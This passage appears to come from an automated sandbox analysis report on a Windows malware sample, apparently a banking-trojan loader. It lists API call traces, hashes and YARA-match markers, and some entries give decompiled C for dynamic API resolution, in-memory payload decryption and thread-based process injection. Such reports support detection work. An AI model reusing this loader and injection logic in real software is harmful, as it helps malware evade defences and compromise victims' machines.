                                                                                                                                        • RegOpenKeyExA.KERNELBASE(004464BA,00000000,00000000,00020119,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00463FA9
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(004464BA,00000000,00000000,00020019,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00463FBD
                                                                                                                                        • RegCloseKey.KERNELBASE(80000001,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00464006
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open$Closelstrcatlstrcpylstrlen
                                                                                                                                        • String ID: Client32$Client64$Software\AppDataLow\Software\Microsoft\
                                                                                                                                        • API String ID: 4131162436-710576342
                                                                                                                                        • Opcode ID: 4c936835cd2d7b6fdc8572ca11b0cd65dea93a918736b499774d832aca304b31
                                                                                                                                        • Instruction ID: 0cd038acefed68c1c852560d7d192ce499ffa299389f36f46dbd7457e1762007
                                                                                                                                        • Opcode Fuzzy Hash: 4c936835cd2d7b6fdc8572ca11b0cd65dea93a918736b499774d832aca304b31
                                                                                                                                        • Instruction Fuzzy Hash: 11115B7190021CFFDB10DF91EC82CAFBBBCEA45758B10407AFA04A2111E678AE089B65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004583CB, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004583EE
                                                                                                                                          • Part of subcall function 004450BE: OpenProcess.KERNEL32(00000400,00000000,0045840E,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450D9
                                                                                                                                          • Part of subcall function 004450BE: IsWow64Process.KERNEL32(00000000,00000000,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450EA
                                                                                                                                          • Part of subcall function 004450BE: FindCloseChangeNotification.KERNELBASE(00000000,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450FD
                                                                                                                                        • ResumeThread.KERNEL32(?,?,?,CCCCFEEB,?,?,?,00000004,?,00000000,0046E088,?,00000000), ref: 004584A8
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000064), ref: 004584B6
                                                                                                                                        • SuspendThread.KERNEL32(?), ref: 004584C9
                                                                                                                                          • Part of subcall function 00441D18: memset.NTDLL ref: 00441FDA
                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 0045854C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$ProcessResumememset$ChangeCloseFindNotificationObjectOpenSingleSuspendWaitWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2336522172-0
                                                                                                                                        • Opcode ID: 3735c4c20fa4a0db738dea70f604b6f6fada234586fdcb74b2e9b9f44fda8610
                                                                                                                                        • Instruction ID: f1b5450761e751aa7b8a9626065499eca74d069bea3276a739c704ddff6e33a3
                                                                                                                                        • Opcode Fuzzy Hash: 3735c4c20fa4a0db738dea70f604b6f6fada234586fdcb74b2e9b9f44fda8610
                                                                                                                                        • Instruction Fuzzy Hash: B841CC71900209BFEF119F95CC85AAE7BB9BF00305F10442EFD05A6262EF78DE598B59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 73751779, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E73751779(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E737518C2(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x73754150 + 0x73755014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x73754150 + 0x737550dc);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E737514B6(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x73754150 + 0x737550ec);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x73754150 + 0x737550ff);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x73754150 + 0x73755114);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x73754150 + 0x7375512a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E73751CEF(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                        0x73751788
                                                                                                                                        0x7375178c
                                                                                                                                        0x7375184e
                                                                                                                                        0x73751792
                                                                                                                                        0x737517aa
                                                                                                                                        0x737517b9
                                                                                                                                        0x737517c0
                                                                                                                                        0x737517c4
                                                                                                                                        0x737517c7
                                                                                                                                        0x73751846
                                                                                                                                        0x73751847
                                                                                                                                        0x737517c9
                                                                                                                                        0x737517d6
                                                                                                                                        0x737517da
                                                                                                                                        0x737517dd
                                                                                                                                        0x00000000
                                                                                                                                        0x737517df
                                                                                                                                        0x737517ec
                                                                                                                                        0x737517f0
                                                                                                                                        0x737517f3
                                                                                                                                        0x00000000
                                                                                                                                        0x737517f5
                                                                                                                                        0x73751802
                                                                                                                                        0x73751806
                                                                                                                                        0x73751809
                                                                                                                                        0x00000000
                                                                                                                                        0x7375180b
                                                                                                                                        0x73751818
                                                                                                                                        0x7375181c
                                                                                                                                        0x7375181f
                                                                                                                                        0x00000000
                                                                                                                                        0x73751821
                                                                                                                                        0x73751827
                                                                                                                                        0x7375182c
                                                                                                                                        0x73751833
                                                                                                                                        0x7375183a
                                                                                                                                        0x7375183d
                                                                                                                                        0x00000000
                                                                                                                                        0x7375183f
                                                                                                                                        0x73751842
                                                                                                                                        0x73751842
                                                                                                                                        0x7375183d
                                                                                                                                        0x7375181f
                                                                                                                                        0x73751809
                                                                                                                                        0x737517f3
                                                                                                                                        0x737517dd
                                                                                                                                        0x737517c7
                                                                                                                                        0x7375185c

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 737518C2: HeapAlloc.KERNEL32(00000000,-00000008,73751A89,?,?,00000000,-00000008,73751DE8), ref: 737518CE
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,737515D5,?,?,?,00000002,?,?,?), ref: 7375179E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 737517C0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 737517D6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 737517EC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 73751802
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 73751818
                                                                                                                                          • Part of subcall function 73751CEF: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,00000002), ref: 73751D4C
                                                                                                                                          • Part of subcall function 73751CEF: memset.NTDLL ref: 73751D6E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1632424568-0
                                                                                                                                        • Opcode ID: 8caa2d901969e53cc2bba338edc945f8dc3200445258b4aa195b91da4a25204a
                                                                                                                                        • Instruction ID: f16097942c0af40ad777790f4e77499a771580c5f7905ec259a1ab21563245cd
                                                                                                                                        • Opcode Fuzzy Hash: 8caa2d901969e53cc2bba338edc945f8dc3200445258b4aa195b91da4a25204a
                                                                                                                                        • Instruction Fuzzy Hash: 832151B290030AAFDB14EF6AC984F9A7BFCEF042657214125F51AC7240E778E905DFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00442710, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • GetModuleHandleA.KERNEL32(4C44544E,00000020,00000000,00000000,?,?,?,?,00441E28,?,?,?,00000000,74B05520), ref: 00442735
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00442757
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0044276D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00442783
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00442799
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 004427AF
                                                                                                                                          • Part of subcall function 0045620F: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 0045626C
                                                                                                                                          • Part of subcall function 0045620F: memset.NTDLL ref: 00456290
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3012371009-0
                                                                                                                                        • Opcode ID: 696d6b2d8d2cb31690a5831aceef3d12d572c41b65a9086cab7a8309c7d7894e
                                                                                                                                        • Instruction ID: 5ddf3c3688af73f2a64327d2669b175695e017d678f7fa588f43fec6c4c84435
                                                                                                                                        • Opcode Fuzzy Hash: 696d6b2d8d2cb31690a5831aceef3d12d572c41b65a9086cab7a8309c7d7894e
                                                                                                                                        • Instruction Fuzzy Hash: CB214BB550120AEFF720DF6ACD44E6B77ECEB08744B01456AF909C7211E6B4E9098B79
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044E398, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,0044403C), ref: 0044E3AF
                                                                                                                                        • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 0044E3C4
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0044E3CF
                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0044E3D9
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044E3E0
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0044E3E9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3832013932-0
                                                                                                                                        • Opcode ID: 12596349bf31f596c501f28d7d30d79e11c5ccb80b27889151229eaf1f3ceb5b
                                                                                                                                        • Instruction ID: ab5f300a1621609e2318bcf75041cf18d9905849181a1eef1f8059073a846789
                                                                                                                                        • Opcode Fuzzy Hash: 12596349bf31f596c501f28d7d30d79e11c5ccb80b27889151229eaf1f3ceb5b
                                                                                                                                        • Instruction Fuzzy Hash: 52F08232145221FBD3221FA1AC08F9FBB68FB09711F010E29FA0191160EFB488059BAF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004420AA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(0046E130,74B04D40,00000018,00000001,00000000,74B04D40,0044BA3A,?,?), ref: 004420C0
                                                                                                                                        • GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,00000000,74B04D40,0044BA3A,?,?), ref: 004420E5
                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 004420F5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$memcpy
                                                                                                                                        • String ID: KERNEL32.DLL$NTDLL.DLL
                                                                                                                                        • API String ID: 1864057842-633099880
                                                                                                                                        • Opcode ID: 5fe7aa475cf48413b40c2bd25bbd2b532fcbc4351233f2802ba7ac7d0c5044aa
                                                                                                                                        • Instruction ID: e05c9dec8cb2f48727ccf211c275cfbd2aa8e249c99f0c65aedc9d599429b64d
                                                                                                                                        • Opcode Fuzzy Hash: 5fe7aa475cf48413b40c2bd25bbd2b532fcbc4351233f2802ba7ac7d0c5044aa
                                                                                                                                        • Instruction Fuzzy Hash: 3D010076600300AAF7119F6AEE41717B6D5BB94701F50043BF644A32A0EAF848088B2F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00451370, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044E8F7: RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
                                                                                                                                          • Part of subcall function 0044E8F7: lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 004513F2
                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1633053242-0
                                                                                                                                        • Opcode ID: 1487300cb69dc6cbc1db5664a4c2f3a26c0c5aa4c64709b92cc5dead600bc24a
                                                                                                                                        • Instruction ID: c4237704f3a086a754ef63f5ff8276de08caed57676454131c134ada2f1e3b54
                                                                                                                                        • Opcode Fuzzy Hash: 1487300cb69dc6cbc1db5664a4c2f3a26c0c5aa4c64709b92cc5dead600bc24a
                                                                                                                                        • Instruction Fuzzy Hash: EB1179B6A00149BFDB019F95CC84CAF7BBEFB48345B11042AF90193221EA759D55DB64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00441268, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0044128D
                                                                                                                                        • GetLastError.KERNEL32 ref: 00441295
                                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 004412AC
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,-4CD94B84,?), ref: 004412D1
                                                                                                                                        • SetLastError.KERNEL32(?), ref: 004412DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$ErrorLastProtect$Query
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 148356745-0
                                                                                                                                        • Opcode ID: 01e89a372eb900b566284856fefd5d7dc00e05d8f322da54bdb854cc3b84da11
                                                                                                                                        • Instruction ID: 44691aa38cb7ffd44075763c36bfeb7e68cbf3f9a196c766e1f2509e565c4075
                                                                                                                                        • Opcode Fuzzy Hash: 01e89a372eb900b566284856fefd5d7dc00e05d8f322da54bdb854cc3b84da11
                                                                                                                                        • Instruction Fuzzy Hash: 9D018C32200209BBEF119F95CD808DABBBCFF0D348B00403AF905E2120EBB4D915EB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004415A5, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004415D3
                                                                                                                                        • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0044165D
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000064,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0044166B
                                                                                                                                        • SuspendThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0044167E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3168247402-0
                                                                                                                                        • Opcode ID: d4dbc6d2604b210560e8147b5e8e8318f7fe96240ec12177fa10806d841ba1e8
                                                                                                                                        • Instruction ID: 324bde36027ec370819d7ad80b7fefe1de5f15540fadd4c5bd084d82ecc886dd
                                                                                                                                        • Opcode Fuzzy Hash: d4dbc6d2604b210560e8147b5e8e8318f7fe96240ec12177fa10806d841ba1e8
                                                                                                                                        • Instruction Fuzzy Hash: 01418A71108301AFE721DF51CD8196BBBE9FB88304F04092EFA94922B0E775D954CB6B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 7375123E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                        			E7375123E(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed int _t61;
				intOrPtr _t78;
				void* _t79;

				_t78 =  *0x73754130;
				_t42 = E73751B43(_t78,  &_v24,  &_v16);
				_v20 = _t42;
				if(_t42 == 0) {
					asm("sbb ebx, ebx");
					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t79 = _t78 + _v24;
					_v40 = _t79;
					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
					_v28 = _t49;
					if(_t49 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t61 <= 0) {
							_t50 =  *0x7375414c;
						} else {
							_t53 = _t49 - _t79;
							_v32 = _t53;
							_v36 = _t53 + _a4 + 0x73755132;
							_v12 = _t79;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("rol edx, cl");
								E73751B9D(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								_v12 = _v12 + 0x1000;
								 *0x7375414c = _t50;
								if(_v8 >= _t61) {
									break;
								}
								_t53 = _v32;
							}
						}
						if(_t50 != 0x59935a40) {
							_v20 = 0xc;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}





















                                                                                                                                        0x73751245
                                                                                                                                        0x73751255
                                                                                                                                        0x7375125c
                                                                                                                                        0x7375125f
                                                                                                                                        0x73751274
                                                                                                                                        0x7375127b
                                                                                                                                        0x73751280
                                                                                                                                        0x73751291
                                                                                                                                        0x73751294
                                                                                                                                        0x7375129c
                                                                                                                                        0x7375129f
                                                                                                                                        0x73751349
                                                                                                                                        0x737512a5
                                                                                                                                        0x737512a5
                                                                                                                                        0x737512ab
                                                                                                                                        0x73751311
                                                                                                                                        0x737512ad
                                                                                                                                        0x737512b0
                                                                                                                                        0x737512ba
                                                                                                                                        0x737512bd
                                                                                                                                        0x737512c0
                                                                                                                                        0x737512c8
                                                                                                                                        0x737512d3
                                                                                                                                        0x737512d4
                                                                                                                                        0x737512d5
                                                                                                                                        0x737512e4
                                                                                                                                        0x737512ed
                                                                                                                                        0x737512f7
                                                                                                                                        0x737512fa
                                                                                                                                        0x737512fd
                                                                                                                                        0x73751307
                                                                                                                                        0x7375130c
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737512c5
                                                                                                                                        0x737512c5
                                                                                                                                        0x7375130e
                                                                                                                                        0x7375131b
                                                                                                                                        0x73751330
                                                                                                                                        0x7375131d
                                                                                                                                        0x73751326
                                                                                                                                        0x7375132b
                                                                                                                                        0x73751341
                                                                                                                                        0x73751341
                                                                                                                                        0x73751350
                                                                                                                                        0x73751356

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,?,?,-00000008,-00000008), ref: 73751294
                                                                                                                                        • memcpy.NTDLL(?,?,-00000008,?,?,-00000008,-00000008,?,?,?,?,?,?,?,?,73751DC2), ref: 73751326
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,-00000008,-00000008), ref: 73751341
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFreememcpy
                                                                                                                                        • String ID: Nov 3 2020
                                                                                                                                        • API String ID: 4010158826-2364069389
                                                                                                                                        • Opcode ID: e9e6119066e064e975cb893313b999bb168c50826575325291f25c455357edfc
                                                                                                                                        • Instruction ID: fd4b5ddb571d760755a686a3bba773cdb479e08d5485e0212e76ef9d6af3ab9c
                                                                                                                                        • Opcode Fuzzy Hash: e9e6119066e064e975cb893313b999bb168c50826575325291f25c455357edfc
                                                                                                                                        • Instruction Fuzzy Hash: 03317A71E0021DABDF05DF99C985BDEBBB9BF08305F248169E905BB240E775AA05CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00444823, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 00444875
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?), ref: 00444904
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 0044491F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFreememcpy
                                                                                                                                        • String ID: Nov 3 2020
                                                                                                                                        • API String ID: 4010158826-2364069389
                                                                                                                                        • Opcode ID: 1a5138f05fddb6ffbee7879fe2e1db949c3f5736252f3881c80530c86db9aa75
                                                                                                                                        • Instruction ID: 67631c4924c49c625da8068c3c30550b7f5dbfbcd84053568a26e4f0e3d58c11
                                                                                                                                        • Opcode Fuzzy Hash: 1a5138f05fddb6ffbee7879fe2e1db949c3f5736252f3881c80530c86db9aa75
                                                                                                                                        • Instruction Fuzzy Hash: E3314B71E00219ABEB00DFA5DC81BEFB7B9FF48704F14406AE900B7241D7B59A059B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00457E1A, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00463FD8,80000001,Client32,?,80000001), ref: 00457E3F
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00457E56
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,00463FD8,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA), ref: 00457E71
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,?,?,?,00463FD8,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\), ref: 00457E90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapQueryValue$AllocateFree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4267586637-0
                                                                                                                                        • Opcode ID: 1bda36edee3e4866320df6a318fc2cbd9e8ff344bfb92431f50f07ad62f3b483
                                                                                                                                        • Instruction ID: 0131c7e27d0226b3e2aa67c89540125f17230a0f260dd8c8229d8b8bb3ddf490
                                                                                                                                        • Opcode Fuzzy Hash: 1bda36edee3e4866320df6a318fc2cbd9e8ff344bfb92431f50f07ad62f3b483
                                                                                                                                        • Instruction Fuzzy Hash: 77118CB6900208FFCB128F94EC85CEFBBBDEB88710F1040A6FC01A2210E2B15E44DB64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 73752058, Relevance: 6.1, APIs: 4, Instructions: 61stringthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                        			E73752058() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t24;
				int _t25;
				void* _t29;
				intOrPtr* _t31;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				int _t41;

				 *0x73754148 =  *0x73754148 & 0x00000000;
				_push(0);
				_push(0x73754144);
				_push(1);
				_push( *0x73754150 + 0x73755084);
				 *0x73754140 = 0xc; // executed
				L7375187A(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E73751A17( &_v44,  &_v28,  *0x7375414c ^ 0xc786104c) == 0) {
					_t24 = 0xb;
					L7:
					ExitThread(_t24);
				}
				_t25 = lstrlenW( *0x73754138);
				_t7 = _t25 + 2; // 0x2
				_t41 = _t25 + _t7;
				_t10 = _t41 + 8; // 0xa
				_t29 = E737513E4(_t37, _t10,  &_v48,  &_v52); // executed
				if(_t29 == 0) {
					_t36 =  *0x73754138;
					_t31 = _v52;
					 *_t31 = 0;
					if(_t36 == 0) {
						 *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
					} else {
						memcpy(_t31 + 4, _t36, _t41);
					}
				}
				_t24 = E737515AB(_v44, _t37); // executed
				goto L7;
			}















                                                                                                                                        0x73752063
                                                                                                                                        0x7375206e
                                                                                                                                        0x73752070
                                                                                                                                        0x73752075
                                                                                                                                        0x7375207d
                                                                                                                                        0x7375207e
                                                                                                                                        0x73752088
                                                                                                                                        0x73752091
                                                                                                                                        0x73752096
                                                                                                                                        0x737520b4
                                                                                                                                        0x73752113
                                                                                                                                        0x73752114
                                                                                                                                        0x73752115
